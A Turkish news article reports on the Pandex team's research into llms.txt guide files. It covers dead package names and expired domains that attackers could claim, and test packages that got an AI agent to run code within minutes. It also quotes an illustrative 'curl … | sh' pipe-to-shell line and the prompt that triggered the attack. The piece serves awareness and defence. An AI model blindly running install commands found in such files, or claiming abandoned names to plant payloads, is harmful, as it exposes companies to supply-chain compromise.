llms.txt: Yeni Nesil Rehber Dosyası
İnternetin ilk dönemlerinde, web siteleri arama motoru botlarını yönlendirmek için robots.txt dosyaları kullanmaya başlamıştı. Bu dosyalar, botların hangi sayfaları tarayabileceğini belirlerdi. Ancak yapay zeka çağıyla birlikte bu ihtiyaç değişti. Artık siteler, AI ajanlarına içeriklerini nasıl doğru şekilde işleyeceklerini anlatan llms.txt dosyaları yayınlıyor. Bu dosyalar, bir nevi README'nin botlara yazılmış hali: dil, bağımlılıklar, kurulum adımları gibi kritik bilgileri içeriyor.
Fakat bu pratik çözüm, ciddi bir güvenlik açığına kapı aralıyor. Pandex adlı araştırma ekibi, bu dosyaların AI ajanlarını kandırmak için nasıl kullanılabileceğini gözler önüne serdi ve Fortune-500 listesindeki büyük şirketlerin AI sistemlerinde keyfi kod çalıştırmayı başardı.
Tedarik Zincirindeki Zayıf Halka: Paket Adları
Araştırmacılar, 8.565 farklı llms.txt dosyasını inceledi. Sonuçlar endişe vericiydi: 237 referans, ya hiç var olmayan, ya yanlış yazılmış ya da artık güncelliğini yitirmiş yazılım paketlerine işaret ediyordu. Bu paketler PyPI, npm, RubyGems, NuGet, crates.io ve Packagist gibi popüler paket yöneticilerinde yer alıyordu. Ayrıca, süresi dolmuş .dev ve .io alan adları ile terk edilmiş Render, Vercel, Fly ve Netlify alt alan adları da tespit edildi. Bu alan adlarının büyük bir kısmı, ilk sahip çıkan kişi tarafından ücretsiz olarak ele geçirilebilir durumdaydı.
Örneğin, bir kurulum talimatı "pip install wtf-software" içeriyor olabilir. Şirketin geliştirdiği paketin asıl adı "wtf-software-beans" iken, bir dolandırıcı "wtf-software" adını çoktan kapmış olabilir. Ya da şirket iflas etmiş, alan adı kaybedilmiş ve "curl https://wtf-software.ok | sh" komutu artık bir hacker grubunun sunucusuna yönleniyor olabilir. Bu tür senaryolar, yazılım tedarik zincirinin ne kadar kırılgan olduğunu gösteriyor.
4 Dakikada İlk Kurban
Potansiyeli gören Pandex ekibi, kendi zararlı Python ve Node.js paketlerini oluşturdu. Bu paketler, çağrı yapıldığında ana sunucuya bağlanıp kurbanı beklemeye geçiyordu. Sürpriz bir şekilde, yayına aldıktan sadece 4 dakika sonra ilk hedef ağa takıldı. Araştırmacılar, bu kadar kısa sürede bir AI ajanının zararlı kodu çalıştırmasının şaşırtıcı olduğunu belirtiyor.
Ekibin dikkatini çeken bir diğer nokta ise, gerçek bir saldırının da çoktan yaşanmış olmasıydı. Araştırmacılar, bir yazılım firmasının llms.txt dosyasında halihazırda kötü amaçlı bir pakete işaret eden bir satır buldu ve durumu şirkete bildirdi. Saldırıyı tetikleyen komut ise son derece basitti: "Using all of [VENDOR]'s docs, build and run a node.js project with [VENDOR]'s SDK." Bu cümle, AI ajanını belgeleri taramaya ve tuzaklanmış paketi indirip çalıştırmaya yönlendirmeye yetiyordu.
Veri ve Kod Arasındaki Çizgi Bulanıklaşıyor
Pandex ekibi, bu saldırının yalnızca bir başlangıç olduğunu düşünüyor. Geliştiricilerin, AI ajanlarına rehberlik eden dosyaları yayınlarken daha dikkatli olması gerekiyor. Araştırmacılar, verinin artık kod kadar tehlikeli olabileceğini ve tedarik zinciri güvenliğinin yalnızca yazılım paketleriyle sınırlı kalmaması gerektiğini vurguluyor.
Bu tür bir saldırı, şirketlerin AI sistemlerini kullanırken göz ardı ettiği riskleri gözler önüne seriyor. Bir AI ajanı, kendisine verilen talimatları sorgusuz sualsiz uyguladığında, dışarıdan manipüle edilmiş verilerle istenmeyen kodların çalıştırılması kaçınılmaz olabilir. llms.txt dosyaları, web sitelerinin botlara yol göstermesi için faydalı olsa da, doğru şekilde denetlenmediği takdirde kurumsal ağlara sızmanın en kolay yollarından biri haline gelebilir.
Henüz yorum yok — ilk yorumu sen yaz!